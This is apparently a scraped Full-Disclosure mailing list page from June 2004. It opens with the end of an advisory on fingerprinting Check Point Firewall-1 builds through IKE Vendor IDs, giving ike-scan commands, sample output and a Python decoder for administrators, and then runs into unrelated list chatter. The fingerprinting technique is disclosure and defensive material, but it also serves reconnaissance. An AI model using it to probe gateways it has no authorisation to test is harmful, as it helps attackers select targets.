> 172.16.2.2 Main Mode Handshake returned
> SA=(Enc=3DES Hash=SHA1 Auth=RSA_Sig Group=2:modp1024
> LifeType=Seconds LifeDuration(4)=0x00007080)
> VID=f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138a000000000000000018800000
> (Firewall-1 NG FP2)
>
> Ending ike-scan 1.6: 1 hosts scanned in 0.009 seconds (108.96 hosts/sec).
> 1 returned handshake; 0 returned notify
>
> Here is a second example fingerprinting an NG AI R54 Firewall using
> hybrid authentication (--auth=64221):
>
> $ ike-scan --vendor=f4ed19e0c114eb516faaac0ee37daf2807b4381f --auth=64221
> -M 172.16.2.2
> Starting ike-scan 1.5.3 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
> 172.16.2.2 Main Mode Handshake returned
> SA=(Enc=3DES Hash=SHA1 Auth=64221 Group=2:modp1024
> LifeType=Seconds LifeDuration(4)=0x00007080)
> VID=f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138c000000000000000018800000
> (Firewall-1 NG AI R54)
>
> References:
>
> http://www.nta-monitor.com/news/checkpoint2004/index.htm Issue details
> http://www.nta-monitor.com/ike-scan/ ike-scan tool
> --
> Roy Hills Tel: +44 1634 721855
> NTA Monitor Ltd FAX: +44 1634 721844
> 14 Ashford House, Beaufort Court,
> Medway City Estate, Email: Roy.Hills
nta-monitor.com
> Rochester, Kent ME2 4FA, UK WWW: http://www.nta-monitor.com/
>
--
http://synfin.net/
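As an added example (not part of Roy Hills' advisory or of the ike-scan tool), the Python below applies the payload layout the advisory describes: it checks a returned Vendor ID for the echoed magic string, reads the version code from hex digits 53-56 and maps it to the build table above, so an administrator can confirm from an ike-scan -M run against their own gateway what it discloses. The sample output is constructed after the listing in the advisory; the second host and its VID are made up.

```python
import binascii
import re
from typing import Optional

# The 20-byte "magic" Vendor ID from the advisory, hex encoded.
FW1_MAGIC = "f4ed19e0c114eb516faaac0ee37daf2807b4381f"

# Version codes found at hex digits 53-56 of the returned payload,
# taken from the advisory's table of observed Vendor IDs.
FW1_VERSIONS = {
    0x0002: "Firewall-1 4.1 Base (no service pack)",
    0x0003: "Firewall-1 4.1 SP1",
    0x0FA2: "Firewall-1 4.1 SP2-SP6",
    0x1388: "Firewall-1 NG Base",
    0x1389: "Firewall-1 NG FP1",
    0x138A: "Firewall-1 NG FP2",
    0x138B: "Firewall-1 NG FP3",
    0x138C: "Firewall-1 NG AI R54",
    0x138D: "Firewall-1 NG AI R55",
}

def decode_fw1_vid(vid_hex: str) -> Optional[dict]:
    """Decode a returned Vendor ID (hex); None unless it is a Firewall-1 VID."""
    vid_hex = vid_hex.strip().lower()
    try:
        raw = binascii.unhexlify(vid_hex)
    except (binascii.Error, ValueError):
        return None  # not valid hex at all
    # Must carry the echoed magic string plus the 20 trailing bytes.
    if not vid_hex.startswith(FW1_MAGIC) or len(raw) < 40:
        return None
    # Hex digits 53-56 (1-based) are bytes 26-27 (0-based); "138d" == 5005 for NG AI R55.
    code = int.from_bytes(raw[26:28], "big")
    return {
        "version_code": code,
        "version": FW1_VERSIONS.get(code, "unknown Firewall-1 build (0x%04x)" % code),
        "trailer_hex": raw[28:40].hex(),  # remaining, undocumented capability bytes
    }

def parse_ike_scan_output(text: str) -> dict:
    """Map host -> decoded Firewall-1 VID from ike-scan multiline (-M) output."""
    results, host = {}, None
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s+Main Mode Handshake returned", line)
        if m:
            host = m.group(1)
            continue
        m = re.match(r"^\s*VID=([0-9a-fA-F]+)", line)
        if m and host:
            decoded = decode_fw1_vid(m.group(1))
            if decoded:  # hosts without a Firewall-1 VID are left out
                results[host] = decoded
    return results

# Constructed sample output, modelled on the -M listing quoted in the advisory;
# the second host and its VID are made up to show the non-matching case.
SAMPLE_OUTPUT = """\
172.16.2.2\tMain Mode Handshake returned
\tSA=(Enc=3DES Hash=SHA1 Auth=RSA_Sig Group=2:modp1024 LifeType=Seconds LifeDuration(4)=0x00007080)
\tVID=f4ed19e0c114eb516faaac0ee37daf2807b4381f000000010000138a000000000000000018800000 (Firewall-1 NG FP2)
192.0.2.10\tMain Mode Handshake returned
\tVID=0123456789abcdef0123456789abcdef (constructed, not Firewall-1)
"""
```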
Re: [Full-Disclosure] spamming trojan?
From: joe smith (joe
joesmith.homeip.net)
Date: Wed Jun 16 2004 - 16:43:40 CDT
http://upx.sourceforge.net/#download
Michael Gargiullo wrote:
>On Wed, 2004-06-16 at 14:25, joe smith wrote:
>
>
>>I used PE Explorer.
>>
>>Looks the june4.exe is some kind of spyware. It reference to another
>>site "cjdra.com", possibly uploading user information there.
>>
>>I just started learning assembly, please pardon my lack of knowledge on
>>reverse engineering.
>>
>>J
>>
>>
>
>By chance, do you know of a similar tools that runs under linux?
>
>
>
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
From: José María Mateos (josemaria.mateos
hispalinux.es)
Date: Wed Jun 16 2004 - 17:00:29 CDT
On Tuesday 15 June at 18:57, Syed Imran Ali wrote:
> about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.
.es still does, and they say it's not going to change, at least
for a while.
Regards.
--
** Las Penas del Agente Smith: http://chema.homelinux.org **
http://EuropeSwPatentFree.hispalinux.es - EuropeSwPatentFree
GPG key ID: 0x2948FA19 | Please encrypt private mail
Re: [Full-Disclosure] Akamai
From: Peter van den Heuvel (peter
bank-connect.com)
Date: Wed Jun 16 2004 - 16:57:46 CDT
Yo!
> In other arenas, they call the concept "diplomatic immunity"....
Indeed. And it is almost as idiotic there. But the issue is that the
Internet does not have any "reverse responsibility" mechanism; an evil
minor-player under a lax-average-provider can do whatever he feels that
suits him best, and disregard majority opinion. An anarchy without even
fundamental feedback regulatory mechanisms is simply prey; me paying for
another's fortune. And the least thing that would work is governments
imposing their preferences. So maybe ICANN and the likes should consider
some form of responsibility in these matters.
Alas, Peter
Re: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.
From: morning_wood (se_cur_ity
hotmail.com)
Date: Wed Jun 16 2004 - 17:23:09 CDT
rofl, are you sure you're not "Bipin"?
>Subject: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.
> File Source disclosure vulnerability in all web servers.
> Remote exploitation of this issue can be achieved by clicking with the
> right button into the website and selecting the "view source code" option.
> This option will display the contents of the html code.
[Full-Disclosure] MS Anti Virus?
From: Andre Ludwig (andre.ludwig
gmail.com)
Date: Wed Jun 16 2004 - 17:53:45 CDT
Oh this should be good...
http://www.reuters.com/newsArticle.jhtml?storyID=5429092
SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile,
Research) is still on track to offer an anti-virus product that will
compete against similar software offered by Symantec Corp. (SYMC.O:
Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote,
Profile, Research) , the world's largest software maker said late on
Monday.
Mike Nash, chief of Microsoft's security business unit, told reporters
that Microsoft is developing software to protect personal computers
running Windows against malicious software, the worms and viruses that
have plagued users with data loss, shutdowns and disruptions in Web
traffic in recent years.
"We're still planning to offer our own AV (anti-virus) product," Nash said.
Asked if that would hurt sales of competing products, such as Network
Associates' McAfee and Symantec's Norton family of products, Nash said
that Microsoft said that it would sell its anti-virus program as a
separate product from Windows, rather than including it in Windows.
Redmond, Washington-based Microsoft acquired anti-virus technology from GeCAD
Software Srl., a Romanian software company, last year to develop its
own software.
Microsoft, whose Windows operating system is a favorite target for
computer viruses, launched a company-wide "Trustworthy Computing"
campaign in early 2002 to boost the security and reliability of its
software.
Nash did not give a time frame for the release of Microsoft's
anti-virus software.
and another
http://www.entmag.com/news/article.asp?EditorialsID=6272
by Scott Bekker
6/16/04
Microsoft is leaning toward offering a paid anti-virus subscription service.
Mike Nash, corporate vice president for the security business and
technology unit at Microsoft, said Microsoft will probably sell its
own anti-virus software and subscription service. It is the first
public signal that Microsoft intends to turn its acquisition of the
Romanian anti-virus company GeCAD into a product customers pay for.
The comments came up at a dinner with reporters in Seattle on Monday
night when Nash was asked how Microsoft's anti-virus efforts might
affect Symantec. "I want to make sure customers have another choice,"
the Bloomberg News agency quoted Nash as saying. "Some people will
continue to use Symantec, and some will use ours."
Shares of Symantec, which gets 85 percent of its revenues from
anti-virus products, were down following Nash's comments, according to
Bloomberg.
Previously, Microsoft had been coy about its plans for GeCAD, which it
acquired last June. "This acquisition will help us and our partner
anti-virus providers further mitigate risks from these threats," Nash
said at the time, implying Microsoft would use GeCAD's programming
talent to make Windows and other Microsoft products more resistant to
viruses.
But Microsoft also immediately indicated at the time that it was fully
evaluating how to proceed with GeCAD's technology and employees. In a
white paper published last June on Microsoft's Web site, the company
wrote, "Details of the Microsoft antivirus solution, including any
product plans, pricing, and a timeline for delivery, are not yet
available. Microsoft strongly recommends that customers continue to
use antivirus solutions from industry partners and keep their virus
signatures updated."
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
From: Andre Ludwig (andre.ludwig
gmail.com)
Date: Wed Jun 16 2004 - 17:49:08 CDT
Just think of all those l33t 0-days you can now have in your webmail!!!
;)
This is definitely OT..
Andre Ludwig CISSP
On Tue, 15 Jun 2004 11:42:10 -0500 (CDT), Ron DuFresne
<dufresne
winternet.com> wrote:
>
>
> The real questions fellows is though, what does any of this have to do
> with security, and who cares how much storage space your particular ISP or
> e-mail provider supplies?
>
> Thanks,
>
> Ron DuFresne
>
>
>
> On Tue, 15 Jun 2004, William Warren wrote:
>
> > hrmm my yahoo account still shows 4.0 megs..do you have a paid account?
> >
> >
> > Syed Imran Ali wrote:
> >
> > > Hiya,
> > >
> > > It is nice to see my inbox today, having 100MB of storage space, 84%
> > > remaining. Yahoo now allows up to 10MB attachment too.... I am not sure
> > > about .co.uk is still allowing POP or not with 100MB, as it was with 6MB.
> > >
> > > Regards,
> > >
> > > S. Imran Ali
> > >
> > >
> >
> > --
> > My "Foundation" verse:
> > Isa 54:17 No weapon that is formed against thee shall prosper; and
> > every tongue that shall rise against thee in judgment thou shalt
> > condemn. This is the heritage of the servants of the LORD, and their
> > righteousness is of me, saith the LORD.
> >
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> "Cutting the space budget really restores my faith in humanity. It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation." -- Johnny Hart
> ***testing, only testing, and damn good at it too!***
>
> OK, so you're a Ph.D. Just don't touch anything.
>
>
>
>
[Full-Disclosure] MS Anti Virus?
http-equiv
excite.com
Date: Wed Jun 16 2004 - 18:29:58 CDT
Well they can't get a simple thing like a mail client right,
they can't get a semi-simple thing like a browser right, they
can't get not-so-simple thing like an operating system right, so
let's branch out and fuck up some other things.
No doubt a few years from now you'll see a line of food in the
stores with their name on it. No doubt limited to doughnuts and
pretzels.
At least they can charge for a whole and the customer will
insist on a portion.
HOLE IN ONE ! gOLf cOURSEs next.
--
http://www.malware.com
Re: [Full-Disclosure] MS Anti Virus?
From: Andre Ludwig (andre.ludwig
gmail.com)
Date: Wed Jun 16 2004 - 18:55:23 CDT
Think the mafia refers to this as a protection racket...
man so much can be made of this, it's a techy comedy gold mine.
"our software sucks so bad that the market for anti virus software for
our platform is such a lucrative market that we can't stay out of it"
Andre Ludwig CISSP
On Wed, 16 Jun 2004 19:41:49 -0400, slacker <leetslacker
softhome.net> wrote:
>
> <snip>
> > SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile,
> > Research) is still on track to offer an anti-virus product that will
> > compete against similar software offered by Symantec Corp. (SYMC.O:
> > Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote,
> > Profile, Research) , the world's largest software maker said late on
>
> Oh yeah, what's the average delay to release on exploit patches? What makes
> me think that they are going to be that slow on releasing AV updates? =P
>
> slacker
>
>
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
From: Shawn Nunley (nunley
gmail.com)
Date: Wed Jun 16 2004 - 20:28:44 CDT
Did anyone else notice that they also raised the storage limit to 2Gb
for paid account holders? (SBC Yahoo DSL and accounts like that,
19.99/mo)
That's quite a lot of spam storage.
Wanna talk about security? How about all those phishing and spam
emails being stored (and potentially opened) for far longer than was
possible before. Seems like a security problem waiting to happen.
So far, in my Gmail account, I've had exactly 0 spam emails, and I
have that address pasted all over the web. Either their spam
filtering is incredible, or the spammers haven't picked it up yet. My
Yahoo account, on the other hand, is 100% spam except for mailing list
traffic.
-Shawn
Shawn Nunley, CISSP
Director, Technology Development
NetScaler, Inc.
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
From: Shawn Nunley (nunley